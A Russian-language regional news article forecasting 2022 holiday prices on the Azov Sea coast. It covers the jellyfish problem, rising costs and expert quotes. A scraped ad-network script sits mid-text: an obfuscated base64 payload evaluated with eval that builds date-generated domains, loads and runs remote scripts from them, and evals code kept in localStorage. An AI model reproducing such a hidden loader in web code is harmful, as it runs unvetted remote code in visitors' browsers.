Эксперты рассказали, как изменятся цены на отдых в 2022 году на побережье Азовского моря.
В августе текущего года заполняемость баз отдыха и отелей Бердянска, Кирилловки и Арабатской стрелки едва достигала 30%, притом что в этот же период прошлого года этот показатель был минимум вдвое выше. Но даже на эту скромную цифру выйти удалось в основном благодаря самым популярным отелям, распродавшим значительную часть номерного фонда еще во время раннего бронирования в конце зимы — начале весны, когда о грядущих проблемах и их размахе никто еще не знал.
При этом прогнозировать ситуацию с главными убийцами курортной отрасли — медузами — сегодня не берется никто. И даже данные, на которые могли бы опираться в своих прогнозах эксперты, практически отсутствуют: экологию внутренних морей в Украине не изучают уже более 10 лет. По крайней мере, уже минимум с 2006-го года, согласно данным открытой библиографии, не было проведено ни единого фундаментального исследования в этом направлении.
Вместе с тем, простого и бюджетного решения проблемы медуз сегодня нет существует, а чтобы предпринимать реальные действия, нужно проводить основательную исследовательскую работу, вкладывать внушительные средства и организационные ресурсы.
При этом зарубежные курорты, существенно снизившие цены в условиях рухнувшего из-за пандемии коронавируса потока туристов, тоже пока не спешат возвращать их к докризисным значениям.
В итоге отечественная туристическая отрасль столкнулась сразу с двумя проблемами: медузы и прочие негативные моменты сделали Азовское море непривлекательным для большого числа отдыхающих, а тягаться с зарубежными курортами в условиях демпинга с их стороны нашим оказалось не под силу. По этой причине уже в завершении сезона — 2021 многие эксперты предсказывали, что в стремлении восстановить упавший спрос владельцы курортного жилья будут корректировать цены.
Но к такому шагу приазовские отельеры оказались пока что не готовы и пытаются найти иные способы вернуть туриста. Кто-то активно строит бассейны, которые могли быть стать альтернативой морю в период нашествия медуз, кто-то развивает гастрономическое направление, кто-то разрабатывает новые экскурсионные программы.
Но снижать цены представители туристической сферы не хотят — главным образом из-за постоянно растущей налоговой нагрузки и расходов, а также сезонности своего бизнеса: за три месяца нужно получить такой доход, которого бы хватило на поддержание номерного фонда и уплату налогов за весь год. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
«Большая часть владельцев гостиничного бизнеса на азовских курортах, которых нам удалось опросить, в настоящее время не планируют снижать цены или включать в прошлогоднюю цену дополнительные услуги или сервисы, за исключением разве что бассейнов. Свою позицию они объясняют существенным удорожанием электроэнергии и коммунальных услуг, повышением налогов на землю и недвижимость, ростом минимальной заработной платы и связанным с ним увеличением налоговых обязательств, а также введением регистраторов расчетных операций (РРО), которые практически наверняка потянут за собой административные расходы и штрафы. В такой ситуации, говорят отельеры, проблематично будет не только снизить цены, но даже сохранить их на уровне прошлого сезона, не снижая при этом сервис и не урезая перечень и качество предоставляемых услуг. Но это касается преимущественно больших и востребованных курортных объектов, которых кризис коснулся меньше всего. Тогда как мини-отели и гостевые дома предпочитают пока не думать о будущем, ограничиваясь возведением бассейнов», — комментирует возможность снижения цен на отдых в 2022 году информагентству «Интерфакс-Украина» главный редактор профильного издания«Старый Азов» Юлия Ангеловская.
В таких условиях многие отели, базы отдыха и гостиницы на курортах Азовского моря, особенно небольшие, с невысокой доходностью, новый сезон могут просто не вытянуть:
«Неудачным минувший сезон для азовских курортов оказался не только из-за медуз — свою роль сыграли и другие факторы. В частности, существенный рост стоимости аренды земли, увеличение минимальной зарплаты, которая влечет за собой повышение сразу нескольких налоговых платежей, рост тарифов на электроэнергию и газ, а также обязательное использование со следующего года регистратора расчетных операций для ФОП. Все это само по себе способно поставить туристический бизнес в тяжелое положение, а медузы лишь усугубили его, и в обозримом будущем ситуация вряд ли изменится. Что будет с отелями в 2022 году, и сколько из них смогут пережить предстоящий сезон, предсказать очень трудно. Единственное, что известно наверняка, это то, что при сохранении прошлогодних цен на отечественных курортах отдыхающие сюда просто не поедут. По крайней мере, большинство из них. А прибыль отеля зависит не от стоимости номера как таковой, как считают многие владельцы гостиничного бизнеса, а в первую очередь от его загрузки. Так что бизнес все же вынужден будет снижать цены, пусть даже при этом придется какое-то время работать доведется с нулевой рентабельностью. Но, конечно, для рынка в целом это будет иметь негативные последствия», — озвучила свое видение ситуацию изданию«Подробности» редактор интернет-издания«Арабат» Юлия Васильева.
Также этот эксперт ставит дополнительный акцент на том, что динамика цен будет отличаться в зависимости от региона:
«Логично предположить, что разница в уровне падения доходов тур-сектора сильно будет зависит и от конкретного региона или даже района курорта. Так, вероятнее всего те же Мелекино и Белосарайская коса из-за расположения на берегу сравнительно пресноводного Таганрогского залива, в котором практически нет медуз, могут получить даже существенный рост потока отдыхающих. В то же время, даже если брать конкретно Арабатскую Стрелку, то здесь тоже есть большая разница в прогнозах падения рынка в зависимости от района косы и, соответственно, типичного портрета потребителя. Так, например, согласно ожиданиям Генгорка пострадает больше всего из-за ориентации в первую очередь на пляжный отдых с детьми. При этом Стрелковое проблема вероятнее всего коснется меньше всего — местный турист чаще всего является поклонником дикого или полудикого отдыха либо вообще едет в Стрелковое ради горячего источника. Соответственно, такая категория туристов без особых проблем передислоцируется с берега Азовского моря на Сиваш, в котором пока нет медуз», — поясняет Юлия Васильева в комментарии “Интерфакс-Украина”.
Более категоричную позицию озвучивают представители служб бронирования. Они убеждены: если цены останутся на том же уровне, что и в 2021 году, львиная доля украинцев с большой долей вероятности предпочтет курортам Азовского моря другие направления. К примеру, аналитик медиа-проекта «Бердянск» Александр Мостовой, спрогнозировал, что падение цен начнется уже после начала курортного сезона — ближе к июлю, когда владельцы поймут, что турист не поехал, и составит в среднем 20–50%.
Подводя итог, можно сказать, что вероятнее всего стоимость отдыха на курортах Азовского моря в 2022 году будет снижаться, но не сразу, а ближе к старту сезона. В то же время непростая экономическая ситуация, спровоцированная ростом тарифов, налогов и других расходов, способна обрушить рынок на ближайшие несколько лет. Об этом пишет Интерфакс. (adsbygoogle = window.adsbygoogle || []).push({});
Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/otdyh-na-beregu-azovskogo-morya-2022-chto-budet-s-tsenami/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook